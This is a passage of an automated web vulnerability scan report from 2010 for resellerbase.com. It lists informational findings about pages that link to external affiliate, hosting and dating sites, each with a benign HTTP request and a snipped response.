<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.spacash.com/?account=resellerbase&fee=flat"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.67. http://www.resellerbase.com/browsepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/browsepr.php?pr=8

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase
http://validator.w3.org/check?uri=referer

Request

GET /browsepr.php?pr=8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 8</tit
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.68. http://www.resellerbase.com/browsepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/browsepr.php?pr=5

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.mediaplazza.com/sysMaster.php?a=movil24

Request

GET /browsepr.php?pr=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 5</tit
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.69. http://www.resellerbase.com/browsepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/browsepr.php?pg_which=3&pr=

The response contains the following links to other domains:

http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.micrositez.co.uk/white-label-seo-reseller-seo.html
http://www.telebay.com/0815
http://www.vod-cash.com/?id=26660
http://www.webcams.com/affiliate/?ref=reseller
http://www.whitelabeldropshipper.com/
http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425
https://secure.videosecrets.com/signup.php?mp_referrer=k2ke

Request

GET /browsepr.php?pg_which=3&pr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: </titl
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.telebay.com/0815" name="link_10"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.telebay.com/0815" name="link_10"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke" name="link_40"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke" name="link_40"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.webcams.com/affiliate/?ref=reseller" name="link_39"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.webcams.com/affiliate/?ref=reseller" name="link_39"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html" name="link_44"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html" name="link_44"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113" name="link_38"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113" name="link_38"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.whitelabeldropshipper.com" name="link_6"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.whitelabeldropshipper.com" name="link_6"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.70. http://www.resellerbase.com/browsepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/browsepr.php?select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9&select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.6-chats.com/ELT
http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php
http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939
http://www.datingrev.com/cgi/go.cgi?where=0815
http://www.dograecorp.com/
http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase
http://www.ian.com/ian/signup/home.jsp?cid=104772
http://www.reseller-products.com/

Request

GET /browsepr.php?select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9&select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:26:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 47397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: </titl
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dograecorp.com" name="link_45"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dograecorp.com" name="link_45"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase" name="link_8"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase" name="link_8"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.reseller-products.com" name="link_11"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.reseller-products.com" name="link_11"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.ian.com/ian/signup/home.jsp?cid=104772" name="link_20"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.ian.com/ian/signup/home.jsp?cid=104772" name="link_20"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.71. http://www.resellerbase.com/browsepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/browsepr.php?pr=6

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase
http://www.resellerclub.com/

Request

GET /browsepr.php?pr=6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: 6</tit
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase" name="link_12"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase" name="link_12"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.resellerclub.com" name="link_17"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.resellerclub.com" name="link_17"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.72. http://www.resellerbase.com/browsepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/browsepr.php?select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://partners.netapplications.com/default.aspx?affid=1640669
http://validator.w3.org/check?uri=referer
http://www.datingrev.com/cgi/go.cgi?where=0815
http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase
http://www.myresellerpanel.com/
http://www.proxyonline.info/
http://www.reseller-products.com/
http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=
http://www.telebay.com/0815
http://www.whitelabeldropshipper.com/
http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425

Request

GET /browsepr.php?select=http%253a%252f%252fwww.resellerbase.com%252fbrowsepr.php%253fpr%253d9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:26:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 49347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: </titl
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.whitelabeldropshipper.com" name="link_6"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.whitelabeldropshipper.com" name="link_6"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.proxyonline.info" name="link_7"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.proxyonline.info" name="link_7"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase" name="link_8"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase" name="link_8"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.telebay.com/0815" name="link_10"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.telebay.com/0815" name="link_10"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.reseller-products.com" name="link_11"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.reseller-products.com" name="link_11"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.73. http://www.resellerbase.com/browsepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/browsepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/browsepr.php?pg_which=2&pr=

The response contains the following links to other domains:

http://af.nudistfriends.com/i/af6025460
http://jigsaw.w3.org/css-validator/check/referer
http://partners.netapplications.com/default.aspx?affid=1640669
http://validator.w3.org/check?uri=referer
http://www.love-money.de/?id=26660
http://www.loveme.com/go/49557
http://www.myresellerpanel.com/
http://www.nemproduction.com/?id=26660
http://www.neondollars.com/track/harrye:wmref:neondollars/
http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156
http://www.proxyonline.info/
http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=

Request

GET /browsepr.php?pg_which=2&pr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:25:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 49647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by PR: </titl
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.loveme.com/go/49557" name="link_22"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.loveme.com/go/49557" name="link_22"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.proxyonline.info" name="link_7"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.proxyonline.info" name="link_7"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.74. http://www.resellerbase.com/communication/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
